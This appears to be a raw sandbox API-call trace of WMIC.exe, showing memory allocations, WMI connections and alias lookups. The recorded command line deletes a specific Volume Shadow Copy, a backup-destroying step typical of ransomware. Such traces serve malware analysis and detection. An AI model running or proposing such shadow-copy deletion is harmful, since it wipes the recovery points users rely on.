[0091.952] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0091.952] SysStringLen (param_1="XML") returned 0x3 [0091.952] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0091.952] SysStringLen (param_1="texttablewsys") returned 0xd [0091.952] SysStringLen (param_1="XML") returned 0x3 [0091.952] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0091.952] malloc (_Size=0x30) returned 0x2f8440 [0091.952] malloc (_Size=0x18) returned 0x2fc920 [0091.952] free (_Block=0x2fc920) [0091.952] malloc (_Size=0x18) returned 0x2fc920 [0091.952] malloc (_Size=0x18) returned 0x2fc940 [0091.952] SysStringLen (param_1="htable-sortby") returned 0xd [0091.952] SysStringLen (param_1="TABLE") returned 0x5 [0091.953] SysStringLen (param_1="htable-sortby") returned 0xd [0091.953] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.953] SysStringLen (param_1="htable-sortby") returned 0xd [0091.953] SysStringLen (param_1="XML") returned 0x3 [0091.953] SysStringLen (param_1="htable-sortby") returned 0xd [0091.953] SysStringLen (param_1="texttablewsys") returned 0xd [0091.953] SysStringLen (param_1="htable-sortby") returned 0xd [0091.953] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0091.953] SysStringLen (param_1="XML") returned 0x3 [0091.953] SysStringLen (param_1="htable-sortby") returned 0xd [0091.953] malloc (_Size=0x30) returned 0x2f8480 [0091.953] malloc (_Size=0x18) returned 0x2fc960 [0091.953] free (_Block=0x2fc960) [0091.953] malloc (_Size=0x18) returned 0x2fc960 [0091.953] malloc (_Size=0x18) returned 0x2fc980 [0091.953] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0091.953] SysStringLen (param_1="TABLE") returned 0x5 [0091.953] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0091.953] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.953] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0091.953] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.953] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0091.953] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0091.953] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.953] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0091.954] malloc (_Size=0x30) returned 0x2f84c0 [0091.954] malloc (_Size=0x18) returned 0x2fc9a0 [0091.954] free (_Block=0x2fc9a0) [0091.954] malloc (_Size=0x18) returned 0x2fc9a0 [0091.954] malloc (_Size=0x18) returned 0x2fc9c0 [0091.954] SysStringLen (param_1="wmiclimofformat") returned 0xf [0091.954] SysStringLen (param_1="TABLE") returned 0x5 [0091.954] SysStringLen (param_1="wmiclimofformat") returned 0xf [0091.954] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.954] SysStringLen (param_1="wmiclimofformat") returned 0xf [0091.954] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.954] SysStringLen (param_1="wmiclimofformat") returned 0xf [0091.954] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0091.954] SysStringLen (param_1="wmiclimofformat") returned 0xf [0091.954] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0091.954] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.954] SysStringLen (param_1="wmiclimofformat") returned 0xf [0091.954] malloc (_Size=0x30) returned 0x2f8500 [0091.955] malloc (_Size=0x18) returned 0x2fc9e0 [0091.955] free (_Block=0x2fc9e0) [0091.955] malloc (_Size=0x18) returned 0x2fc9e0 [0091.955] malloc (_Size=0x18) returned 0x2fca00 [0091.955] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0091.955] SysStringLen (param_1="TABLE") returned 0x5 [0091.955] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0091.955] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.955] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0091.955] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.955] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0091.955] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.955] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.955] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0091.955] malloc (_Size=0x30) returned 0x2f8540 [0091.955] malloc (_Size=0x18) returned 0x2fca20 [0091.955] free (_Block=0x2fca20) [0091.955] malloc (_Size=0x18) returned 0x2fca20 [0091.955] malloc (_Size=0x18) returned 0x2fca40 [0091.956] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0091.956] SysStringLen (param_1="TABLE") returned 0x5 [0091.956] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0091.956] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.956] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0091.956] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.956] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0091.956] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.956] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0091.956] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0091.956] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.956] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0091.956] malloc (_Size=0x30) returned 0x2f8580 [0091.956] FreeThreadedDOMDocument:IUnknown:Release (This=0x23271d0) returned 0x0 [0091.956] free (_Block=0x2f6e90) [0091.956] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete" [0091.956] malloc (_Size=0xe0) returned 0x2fcd30 [0091.956] memcpy_s (in: _Destination=0x2fcd30, _DestinationSize=0xde, _Source=0x4025be, _SourceSize=0xd0 | out: _Destination=0x2fcd30) returned 0x0 [0091.956] malloc (_Size=0x18) returned 0x2fca60 [0091.957] malloc (_Size=0x18) returned 0x2fca80 [0091.957] malloc (_Size=0x18) returned 0x2fcaa0 [0091.957] malloc (_Size=0x18) returned 0x2fcac0 [0091.957] malloc (_Size=0x80) returned 0x2f6e90 [0091.957] GetLocalTime (in: lpSystemTime=0x20f690 | out: lpSystemTime=0x20f690*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x36, wSecond=0x38, wMilliseconds=0x239)) [0091.957] _vsnwprintf (in: _Buffer=0x2f6e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x20f5e8 | out: _Buffer="09-04-2020T08:54:56") returned 19 [0091.957] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.957] malloc (_Size=0x90) returned 0x2f70a0 [0091.957] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.957] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.957] malloc (_Size=0x90) returned 0x2fce20 [0091.957] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.957] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.957] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.957] malloc (_Size=0x16) returned 0x2fcae0 [0091.957] lstrlenW (lpString="shadowcopy") returned 10 [0091.957] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0091.957] malloc (_Size=0x16) returned 0x2fcb00 [0091.957] malloc (_Size=0x8) returned 0x2f7140 [0091.957] free (_Block=0x0) [0091.957] free (_Block=0x2fcae0) [0091.957] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.957] malloc (_Size=0xc) returned 0x2fcae0 [0091.957] lstrlenW (lpString="where") returned 5 [0091.957] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0091.957] malloc (_Size=0xc) returned 0x2fcb20 [0091.957] malloc (_Size=0x10) returned 0x2fcb40 [0091.957] memmove_s (in: _Destination=0x2fcb40, _DestinationSize=0x8, _Source=0x2f7140, _SourceSize=0x8 | out: _Destination=0x2fcb40) returned 0x0 [0091.958] free (_Block=0x2f7140) [0091.958] free (_Block=0x0) [0091.958] free (_Block=0x2fcae0) [0091.958] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.958] malloc (_Size=0x5c) returned 0x2fcec0 [0091.958] lstrlenW (lpString="\"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\"") returned 45 [0091.958] _wcsicmp (_String1="\"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\"", _String2="\"NULL\"") returned -5 [0091.958] lstrlenW (lpString="\"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\"") returned 45 [0091.958] lstrlenW (lpString="\"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\"") returned 45 [0091.958] malloc (_Size=0x5c) returned 0x2fcf30 [0091.958] malloc (_Size=0x18) returned 0x2fcae0 [0091.958] memmove_s (in: _Destination=0x2fcae0, _DestinationSize=0x10, _Source=0x2fcb40, _SourceSize=0x10 | out: _Destination=0x2fcae0) returned 0x0 [0091.958] free (_Block=0x2fcb40) [0091.958] free (_Block=0x0) [0091.958] free (_Block=0x2fcec0) [0091.958] lstrlenW (lpString=" shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 71 [0091.958] malloc (_Size=0xe) returned 0x2fcb40 [0091.958] lstrlenW (lpString="delete") returned 6 [0091.958] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0091.958] malloc (_Size=0xe) returned 0x2fcb60 [0091.958] malloc (_Size=0x20) returned 0x2fcec0 [0091.958] memmove_s (in: _Destination=0x2fcec0, _DestinationSize=0x18, _Source=0x2fcae0, _SourceSize=0x18 | out: _Destination=0x2fcec0) returned 0x0 [0091.958] free (_Block=0x2fcae0) [0091.958] free (_Block=0x0) [0091.958] free (_Block=0x2fcb40) [0091.958] malloc (_Size=0x20) returned 0x2fcef0 [0091.958] lstrlenW (lpString="QUIT") returned 4 [0091.958] lstrlenW (lpString="shadowcopy") returned 10 [0091.958] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0091.958] lstrlenW (lpString="EXIT") returned 4 [0091.958] lstrlenW (lpString="shadowcopy") returned 10 [0091.959] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0091.959] free (_Block=0x2fcef0) [0091.959] WbemLocator:IUnknown:AddRef (This=0x1df1390) returned 0x2 [0091.959] malloc (_Size=0x20) returned 0x2fcef0 [0091.959] lstrlenW (lpString="/") returned 1 [0091.959] lstrlenW (lpString="shadowcopy") returned 10 [0091.959] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0091.959] lstrlenW (lpString="-") returned 1 [0091.959] lstrlenW (lpString="shadowcopy") returned 10 [0091.959] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0091.959] lstrlenW (lpString="CLASS") returned 5 [0091.959] lstrlenW (lpString="shadowcopy") returned 10 [0091.959] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0091.959] lstrlenW (lpString="PATH") returned 4 [0091.959] lstrlenW (lpString="shadowcopy") returned 10 [0091.959] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0091.959] lstrlenW (lpString="CONTEXT") returned 7 [0091.959] lstrlenW (lpString="shadowcopy") returned 10 [0091.959] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0091.959] lstrlenW (lpString="shadowcopy") returned 10 [0091.959] malloc (_Size=0x16) returned 0x2fcb40 [0091.959] lstrlenW (lpString="shadowcopy") returned 10 [0091.959] GetCurrentThreadId () returned 0xab8 [0091.959] ??0CHString@@QEAA@XZ () returned 0x20f4a0 [0091.959] malloc (_Size=0x18) returned 0x2fcae0 [0091.959] malloc (_Size=0x18) returned 0x2fcb80 [0091.959] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1df1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff402998 | out: ppNamespace=0xff402998*=0x1e03a98) returned 0x0 [0091.974] free (_Block=0x2fcb80) [0091.974] free (_Block=0x2fcae0) [0091.975] CoSetProxyBlanket (pProxy=0x1e03a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0091.975] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.975] GetCurrentThreadId () returned 0xab8 [0091.975] ??0CHString@@QEAA@XZ () returned 0x20f338 [0091.975] malloc (_Size=0x18) returned 0x2fcae0 [0091.975] malloc (_Size=0x18) returned 0x2fcb80 [0091.975] malloc (_Size=0x18) returned 0x2fcba0 [0091.975] malloc (_Size=0x18) returned 0x2fcbc0 [0091.975] SysStringLen (param_1="root\\cli") returned 0x8 [0091.975] SysStringLen (param_1="\\") returned 0x1 [0091.975] malloc (_Size=0x18) returned 0x2fcbe0 [0091.975] SysStringLen (param_1="root\\cli\\") returned 0x9 [0091.975] SysStringLen (param_1="ms_409") returned 0x6 [0091.975] free (_Block=0x2fcbc0) [0091.975] free (_Block=0x2fcba0) [0091.975] free (_Block=0x2fcb80) [0091.976] free (_Block=0x2fcae0) [0091.976] malloc (_Size=0x18) returned 0x2fcae0 [0091.976] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1df1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4029a0 | out: ppNamespace=0xff4029a0*=0x1e03b28) returned 0x0 [0091.980] free (_Block=0x2fcae0) [0091.980] free (_Block=0x2fcbe0) [0091.980] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.980] GetCurrentThreadId () returned 0xab8 [0091.980] ??0CHString@@QEAA@XZ () returned 0x20f4b0 [0091.980] malloc (_Size=0x18) returned 0x2fcbe0 [0091.980] malloc (_Size=0x18) returned 0x2fcae0 [0091.980] malloc (_Size=0x18) returned 0x2fcb80 [0091.980] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0091.980] malloc (_Size=0x3a) returned 0x2fcfa0 [0091.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff391980, cbMultiByte=-1, lpWideCharStr=0x2fcfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0091.980] free (_Block=0x2fcfa0) [0091.980] malloc (_Size=0x18) returned 0x2fcba0 [0091.980] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0091.980] SysStringLen (param_1="shadowcopy") returned 0xa [0091.980] malloc (_Size=0x18) returned 0x2fcbc0 [0091.980] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0091.980] SysStringLen (param_1="'") returned 0x1 [0091.980] free (_Block=0x2fcba0) [0091.980] free (_Block=0x2fcb80) [0091.980] free (_Block=0x2fcae0) [0091.980] free (_Block=0x2fcbe0) [0091.981] IWbemServices:GetObject (in: This=0x1e03a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x20f4b8*=0x0, ppCallResult=0x0 | out: ppObject=0x20f4b8*=0x1e104e0, ppCallResult=0x0) returned 0x0 [0091.986] malloc (_Size=0x18) returned 0x2fcbe0 [0091.986] IWbemClassObject:Get (in: This=0x1e104e0, wszName="Target", lFlags=0, pVal=0x20f3e0*(varType=0x0, wReserved1=0xff40, wReserved2=0x0, wReserved3=0x0, varVal1=0xff402998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f3e0*(varType=0x8, wReserved1=0xff40, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.986] free (_Block=0x2fcbe0) [0091.986] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0091.986] malloc (_Size=0x3e) returned 0x2fcfa0 [0091.986] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0091.986] malloc (_Size=0x18) returned 0x2fcbe0 [0091.986] IWbemClassObject:Get (in: This=0x1e104e0, wszName="PWhere", lFlags=0, pVal=0x20f3e0*(varType=0x0, wReserved1=0xff40, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f3e0*(varType=0x8, wReserved1=0xff40, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.986] free (_Block=0x2fcbe0) [0091.986] lstrlenW (lpString=" Where ID = '#'") returned 15 [0091.986] malloc (_Size=0x20) returned 0x2fcff0 [0091.986] lstrlenW (lpString=" Where ID = '#'") returned 15 [0091.986] malloc (_Size=0x18) returned 0x2fcbe0 [0091.986] IWbemClassObject:Get (in: This=0x1e104e0, wszName="Connection", lFlags=0, pVal=0x20f3e0*(varType=0x0, wReserved1=0xff40, wReserved2=0x0, wReserved3=0x0, varVal1=0x47bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f3e0*(varType=0xd, wReserved1=0xff40, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e109c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.986] free (_Block=0x2fcbe0) [0091.986] IUnknown:QueryInterface (in: This=0x1e109c0, riid=0xff397360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x20f3d0 | out: ppvObject=0x20f3d0*=0x1e109c0) returned 0x0 [0091.986] GetCurrentThreadId () returned 0xab8 [0091.986] ??0CHString@@QEAA@XZ () returned 0x20f2f8 [0091.986] malloc (_Size=0x18) returned 0x2fcbe0 [0091.987] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Namespace", lFlags=0, pVal=0x20f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff3a738f, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f320*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.987] free (_Block=0x2fcbe0) [0091.987] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0091.987] malloc (_Size=0x16) returned 0x2fcbe0 [0091.987] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0091.987] malloc (_Size=0x18) returned 0x2fcae0 [0091.987] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Locale", lFlags=0, pVal=0x20f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f320*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.987] free (_Block=0x2fcae0) [0091.987] lstrlenW (lpString="ms_409") returned 6 [0091.987] malloc (_Size=0xe) returned 0x2fcae0 [0091.987] lstrlenW (lpString="ms_409") returned 6 [0091.987] malloc (_Size=0x18) returned 0x2fcb80 [0091.987] IWbemClassObject:Get (in: This=0x1e109c0, wszName="User", lFlags=0, pVal=0x20f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.987] free (_Block=0x2fcb80) [0091.987] malloc (_Size=0x18) returned 0x2fcb80 [0091.987] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Password", lFlags=0, pVal=0x20f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.987] free (_Block=0x2fcb80) [0091.987] malloc (_Size=0x18) returned 0x2fcb80 [0091.987] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Server", lFlags=0, pVal=0x20f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f320*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.987] free (_Block=0x2fcb80) [0091.987] lstrlenW (lpString=".") returned 1 [0091.987] malloc (_Size=0x4) returned 0x2f7140 [0091.988] lstrlenW (lpString=".") returned 1 [0091.988] malloc (_Size=0x18) returned 0x2fcb80 [0091.988] IWbemClassObject:Get (in: This=0x1e109c0, wszName="Authority", lFlags=0, pVal=0x20f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0x2fcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0091.988] free (_Block=0x2fcb80) [0091.988] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.988] IUnknown:Release (This=0x1e109c0) returned 0x1 [0091.988] GetCurrentThreadId () returned 0xab8 [0091.988] ??0CHString@@QEAA@XZ () returned 0x20f2f8 [0091.988] malloc (_Size=0x18) returned 0x2fcb80 [0091.988] IWbemClassObject:Get (in: This=0x1e104e0, wszName="__RELPATH", lFlags=0, pVal=0x20f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4aa658, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x20f320*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0091.988] free (_Block=0x2fcb80) [0091.988] malloc (_Size=0x18) returned 0x2fcb80 [0091.988] GetCurrentThreadId () returned 0xab8 [0091.988] ??0CHString@@QEAA@XZ () returned 0x20f178 [0091.988] ??0CHString@@QEAA@PEBG@Z () returned 0x20f190 [0091.988] ??0CHString@@QEAA@AEBV0@@Z () returned 0x20f120 [0091.989] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0091.989] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2fd020 [0091.989] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0091.989] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x20f0e0 [0091.989] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x20f128 [0091.989] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x20f190 [0091.989] ??1CHString@@QEAA@XZ () returned 0x8151501 [0091.989] ??1CHString@@QEAA@XZ () returned 0x8151501 [0091.989] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x20f0e8 [0091.989] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x20f120 [0091.989] ??1CHString@@QEAA@XZ () returned 0x1 [0091.989] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2fd090 [0091.989] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0091.989] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x20f0e0 [0091.989] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x20f128 [0091.989] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x20f190 [0091.989] ??1CHString@@QEAA@XZ () returned 0x8151501 [0091.989] ??1CHString@@QEAA@XZ () returned 0x8151501 [0091.989] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x20f0e8 [0091.989] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x20f120 [0091.989] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.989] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0091.989] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.989] malloc (_Size=0x18) returned 0x2fcba0 [0091.989] malloc (_Size=0x18) returned 0x2fcc00 [0091.989] malloc (_Size=0x18) returned 0x2fcc20 [0091.989] malloc (_Size=0x18) returned 0x2fcc40 [0091.989] malloc (_Size=0x18) returned 0x2fcc60 [0091.989] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0091.990] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0091.990] malloc (_Size=0x18) returned 0x2fcc80 [0091.990] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0091.990] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0091.990] malloc (_Size=0x18) returned 0x2fcca0 [0091.990] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0091.990] SysStringLen (param_1="\"") returned 0x1 [0091.990] free (_Block=0x2fcc80) [0091.990] free (_Block=0x2fcc60) [0091.990] free (_Block=0x2fcc40) [0091.990] free (_Block=0x2fcc20) [0091.990] free (_Block=0x2fcc00) [0091.990] free (_Block=0x2fcba0) [0091.991] IWbemServices:GetObject (in: This=0x1e03b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x20f168*=0x0, ppCallResult=0x0 | out: ppObject=0x20f168*=0x1e10a50, ppCallResult=0x0) returned 0x0 [0091.992] malloc (_Size=0x18) returned 0x2fcba0 [0091.992] IWbemClassObject:Get (in: This=0x1e10a50, wszName="Text", lFlags=0, pVal=0x20f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff402ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x20f1a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4a4ab0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x42e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0091.992] free (_Block=0x2fcba0) [0091.992] SafeArrayGetLBound (in: psa=0x4a4ab0, nDim=0x1, plLbound=0x20f180 | out: plLbound=0x20f180) returned 0x0 [0091.992] SafeArrayGetUBound (in: psa=0x4a4ab0, nDim=0x1, plUbound=0x20f170 | out: plUbound=0x20f170) returned 0x0 [0091.992] SafeArrayGetElement (in: psa=0x4a4ab0, rgIndices=0x20f164, pv=0x20f1b8 | out: pv=0x20f1b8) returned 0x0 [0091.992] malloc (_Size=0x18) returned 0x2fcba0 [0091.992] malloc (_Size=0x18) returned 0x2fcc00 [0091.992] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0091.992] free (_Block=0x2fcba0) [0091.992] IUnknown:Release (This=0x1e10a50) returned 0x0 [0091.992] free (_Block=0x2fcca0) [0091.992] ??1CHString@@QEAA@XZ () returned 0x8151501 [0091.993] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.993] free (_Block=0x2fcb80) [0091.993] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c 